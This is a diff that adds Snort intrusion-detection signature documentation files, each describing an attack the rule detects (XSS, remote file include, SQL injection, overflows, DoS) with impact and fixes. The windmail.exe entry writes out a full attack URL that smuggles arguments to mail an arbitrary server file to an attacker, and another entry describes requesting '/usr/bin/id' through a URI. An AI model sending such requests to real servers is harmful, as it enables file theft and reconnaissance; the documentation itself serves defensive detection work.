+++ b/doc/signatures/100000795.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000795
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Pivot" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "bg" parameter in the "blogroll.php" script used by the "Pivot" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Pivot
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/1914.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1916
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a format
+string vulnerability associated with the Remote Procedure Call (RPC)
+rpc.statd.
+
+--
+Impact:
+Remote root access. This may permit execution of arbitrary commands with
+the privileges of root.
+
+--
+Detailed Information:
+The rpc.statd daemon is a component of Network File System (NFS) that
+implements the Network Status and Monitor (NSM) RPC functions.  NSM
+monitors the status of NFS clients and servers and maintains a list of
+hosts that have registered to be notified when an NFS host crashes. 
+There is a format string vulnerability associated with the code that
+implements the monitoring of a given host, possibly permitting the
+execution of arbitrary commands with the privileges of root. 
+
+--
+Affected Systems:
+	Conectiva Linux 4.0, 4.1, 4.2, 5.0, 5.1
+	Debian Linux 2.2, 2.3
+	Red Hat Linux 6.0, 6.1, 6.2
+	SuSE Linux 6.3, 6.4, 7.0
+	Trustix Secure Linux 1.0, 1.1
+
+--
+Attack Scenarios:
+An attacker can attempt to exploit the format string error allowing
+execution of arbitrary commands with the privileges of root.  
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1053.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1053
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000356.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000356
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "BASE" application running on a webserver. Access to the file "base_qry_common.php" using a remote file being passed as the "BASE_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "BASE_path" parameter in the "base_qry_common.php" script used by the "BASE" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BASE
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1332.txt
@@ -0,0 +1,81 @@
+Rule:
+
+--
+Sid:
+1332
+
+--
+Summary:
+Attempted id command access via web
+
+--
+Impact:
+Attempt to gain information on users and groups that exist on the host
+using the id command.
+
+--
+Detailed Information:
+This is an attempt to gain intelligence about the users on a host. "id"
+is a UNIX command that will return information about the system's users
+and groups. This information is valuable to an attacker who can use it
+to plan further attacks based on the users possible login information or
+be more effective in targeting specific users and groups who possess
+elevated privileges . The id command will return information on the
+user, the groups the user belings to and the users' "gid" and "uid".
+
+The rule looks for the "id" command in the client to web server network
+traffic and does not indicate whether the command was actually
+successful in showing the user information. The presence of the "id"
+command web traffic indicates that an attacker attempted to trick the
+web server into executing system in non-interactive mode i.e. without a
+valid shell session. 
+
+Alternatively this rule may trigger in an unencrypted HTTP tunneling
+connection to the server or a shell connection via another exploit
+against the web server.
+
+--
+Attack Scenarios:
+1. The attacker can make a standard HTTP request that contains
+'/usr/bin/id' in the URI which can then return sensitive information on
+groups and users present on the host. 
+
+2. This command may also be requested on a command line should the
+attacker gain access to the machine.
+
+3. An attacker uses a "id" command via a web server connection to test
+what username the web server runs under. He then looks for all the files
+writable by this user and find a web server configuration file with
+wrong permissions.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries
+outside of it's designated web root or cgi-bin. 
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Additional information from Anton Chuvakin <http://www.chuvakin.org>
+
+-- 
+Additional References:
+sid: 1333
+
+man id
+
+--
--- /dev/null
+++ b/doc/signatures/371.txt
@@ -0,0 +1,55 @@
+Rule:
+--
+Sid:
+371
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a Cisco IOS 9.x system.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a system running Cisco IOS 9.x contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS153
+
+--
--- /dev/null
+++ b/doc/signatures/100000118.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+100000118
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a buffer overflow 
+present in Internet Explorer's urlmon.dll file.
+
+-- 
+
+Impact: 
+An attacker may execute arbitrary commands with the privileges of the user 
+running Internet Explorer.
+
+--
+Detailed Information:
+If a web server sends data with a Content-Type value of 300 or more bytes, a 
+buffer overflow is triggered, and commands may be executed with the privileges 
+of the user running Internet Explorer.
+
+--
+Affected Systems:
+Internet Explorer 5.0.1
+Internet Explorer 5.0.1 SP1
+Internet Explorer 5.0.1 SP2
+Internet Explorer 5.0.1 SP3
+Internet Explorer 5.5
+Internet Explorer 5.5 SP1
+Internet Explorer 5.5 SP2
+Internet Explorer 6.0
+Internet Explorer 6.0 SP1
+
+--
+
+Attack Scenarios: 
+An attacker must entice a user to click on a link to a properly configured 
+server, which will return the necessary data.
+
+-- 
+
+Ease of Attack: 
+Medium. An attacker must control a properly configured web server, and entice 
+users to click on a link to that server.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Apply the latest patches for Internet Explorer from Microsoft.com.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/486.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+
+Sid:
+486
+
+--
+
+Summary:
+This event is generated when an ICMP destination unreachable
+(Communication with Destination Host is Administratively Prohibited)
+datagram is detected on the network.  
+
+--
+
+Impact:
+This message is generated when a datagram failed to traverse the
+network.  This could be an indication of routing or network problems.
+
+--
+
+Detailed Information: 
+This rule generates informational events about the network.  Large
+numbers of these messages on the network could indication routing
+problems, faulty routing devices, or improperly configured hosts.
+
+--
+
+Attack Scenarios:
+None known.
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate these types of ICMP datagrams.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+This rule detects informational network information, so no corrective
+action is necessary.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None.
+
+
+--
--- /dev/null
+++ b/doc/signatures/2102.txt
@@ -0,0 +1,81 @@
+Rule:  
+
+--
+Sid: 2102
+
+--
+Summary:
+
+A buffer overflow exists in the SMB (Server Message Block) Protocol 
+implementation in Microsfot Windows NT, Windows 2000, and Windows XP 
+that allows attackers to cause a denial of service via a NetShareEnum 
+request.
+
+This rule has been deprecated due to an inordinately large number of 
+false positives. Rule 2101 has been modified to take this into account.
+
+--
+Impact:
+
+An attacker can cause the target system to lock up and require manual
+reboot.  With more research, an attacker may be able to exploit this
+buffer overflow and execute arbitrary code, but this research has not
+been made public at this time.
+
+--
+Detailed Information:
+
+SMB on a vulnerable system may crash if it recieves a specially crafted
+packet containing a NetServerEnum, NetServerEnum2, or NetServerEnum3 
+transaction request.  If either the paramaters "Max Parameter Count" or
+"Max Data Count" are set to 0, then a vulnerable system will crash.  
+NetServerEnum requests require an authorized user account, however 
+NetServerEnum2 and NetServerEnum3 require anonymous access.  Anonymous
+access is enabled by default.  This signature looks for a "Max Data Count" 
+set to 0.
+
+--
+Attack Scenarios:
+
+An attacker would use one of the various publicly available tools to launch
+this attack.
+
+--
+Ease of Attack:
+
+Numerous tools, including a windows binary (SMBDie.exe), have been made
+publicly availablet exploit the denial of service portion of this vulnerability.
+
+--
+False Positives:
+
+This rule may trigger on functions other than NetServerEnum, NetServerEnum2,
+or NetServerEnum3.  Because a SMB decoder is not available in Snort at this time,
+verifying that the function that is being called is not feasable.
+
+--
+False Negatives:
+
+No false negatives are known at this time.
+
+--
+Corrective Action:
+
+Install the patches available from Microsoft.  The patches are listed in
+Microsoft's advisory for this vulnerability.
+
+www.microsoft.com/technet/security/bulletin/MS02-045.asp
+
+--
+Contributors:
+
+Brian Caswell <bmc@snort.org>
+
+-- 
+Additional References:
+
+cve,CAN-2002-0724
+url,www.microsoft.com/technet/security/bulletin/MS02-045.asp; 
+url,www.corest.com/common/showdoc.php?idx=262; 
+
+--
--- /dev/null
+++ b/doc/signatures/100000863.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "PHPMyRing" application running on a webserver. Access to 
+the file "view_com.php" with SQL commands being passed as the "idsite" 
+parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "idsite" parameter in the "view_com.php" script used by 
+the "PHPMyRing" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPMyRing
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
--- /dev/null
+++ b/doc/signatures/944.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+944
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+In this case an attempt is being made to access the executable file
+fpremadm.exe from resources external to the protected network.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/resources/documentation/office/2000/all/reskit/en-us/75t4_5.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/1879.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1879
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3054.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+3054
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ethereal.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Ethereal is a multi-platform network protocol analyser capable of
+displaying network data to the user in a graphical user interface.
+
+An error in the processing of access control lists (ACLs) concerning the
+size of the access control entries (ACEs) may lead to a Denial of Service
+(DoS) condition in Ethereal. The ACL parsing routine trusts the size of
+the ACE given in the packet during processing. If a sufficiently large ACL
+structure is supplied combined with a specified ACE size of 0, it is
+possible to cause the DoS condition to occur.
+
+--
+Affected Systems:
+	Ethereal 0.10.7 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to craft packet data containing large NT ACLs, the
+attacker then needs to specify one of the ACEs as having a size of 0.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3462.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+3462
+
+--
+Summary:
+This event is generated when an attempt is made to overflow a buffer
+using the Content-Encoding parameter.
+
+--
+Impact:
+Serious. Code execution is possible.
+
+--
+Detailed Information:
+Internet Explorer does not correctly handle Content-Type or
+Content-Encoding headers returned from a server. It is possible to
+overflow a static buffer in urlmon.dll by supplying more than 300 bytes
+of data in the parameter for those headers.
+
+Specifically the error occurs when an image tag <img> is used to pass
+the excess data to both those header fields in a server response. Since
+some email clients use Internet Explorer to process HTML email messages,
+it is also possible to cause this overflow to occur via email.
+
+--
+Affected Systems:
+	Microsoft Windows systems
+
+--
+Attack Scenarios:
+An attacker can supply a malicious HTML file to a mail client containing
+excess data in the Content-Type and Content-Encoding headers that will
+overflow the buffer presenting them with the opportunity to write to
+various parts of memory and possibly execute code of their choosing.
+
+--
+Ease of Attack:
+Simple. Exploit code is publicly available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References
+
+--
--- /dev/null
+++ b/doc/signatures/2521.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2521
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1713.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1713
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1158.txt
@@ -0,0 +1,69 @@
+Rule:  
+
+--
+
+Sid:
+1158
+
+--
+
+Summary:
+This event is generated when an attempt is made to access the executable
+file WindMail.exe using a web connection.
+
+--
+Impact:
+Remote attackers could subvert the WindMail mailer to read or execute
+arbitrary files on the web server
+
+--
+Detailed Information:
+WindMail is a commandline mail program for Windows.  It is sometimes
+deployed for scripting or for sending email through a web application.
+Some windmail deployments make webmail.exe a CGI application, which it was
+not designed to do.  The result is that an attacker could read or
+execute arbitrary files on the system that the web server has access to.
+It should never be a CGI application itself, and instead should be called
+by another program that properly filters input.
+
+--
+Affected Systems:
+	All systems using windmail.exe
+
+--
+Attack Scenarios:
+http://target/cgi-bin/windmail.exe?%20-n%20desired.file%20attacker_email_address
+
+--
+Ease of Attack:
+Simple crafting of a web GET request
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+If a CGI script calls windmail.exe, but windmail.exe itself is not a CGI
+application, then this rule will not generate an event. If the CGI
+application does not properly filter input, there is a possibility
+that the attack could still succeed.
+
+--
+Corrective Action:
+Look at the packet to determine whether a request was made via an HTTP GET
+for the windmail.exe application. If so, determine whether the attacked
+web server had windmail.exe on it.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000353.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000353
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "tinyBB" application running on a webserver. Access to the file "footers.php" using a remote file being passed as the "tinybb_footers" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "tinybb_footers" parameter in the "footers.php" script used by the "tinyBB" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using tinyBB
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000383.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000383
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "OsTicket" application running on a webserver. Access to the file "open_form.php" using a remote file being passed as the "include_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "include_path" parameter in the "open_form.php" script used by the "OsTicket" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using OsTicket
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1840.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+1840
+
+--
+Summary:
+This event is generated when a client on the protected network has 
+possibly visited a website containing malicious javascript code.
+
+--
+Impact:
+Minimal
+
+--
+Detailed Information:
+Implementations of Javascript in multiple browsers on multiple platforms
+contain an error that may lead to a user inadvertantly running
+Javascript code of an attackers choosing. IP address lookup for a fully
+qualified domain name is not performed when choosing whether Javascript 
+should be executed, if the hostname is served from a DNS server
+controlled by the attacker it may be possible for the attacker to run
+code of their choosing. 
+
+--
+Affected Systems:
+	Multiple browsers on multiple platforms.
+
+--
+Attack Scenarios:
+An attacker might try to fool a user into clicking a link in an email
+that points at an intranet server. The attacker is then able to run
+Javascript from a secondary host purporting to be the intranet server.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives: 
+None known
+
+--
+False Negatives: 
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com> 
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1127.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1127
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
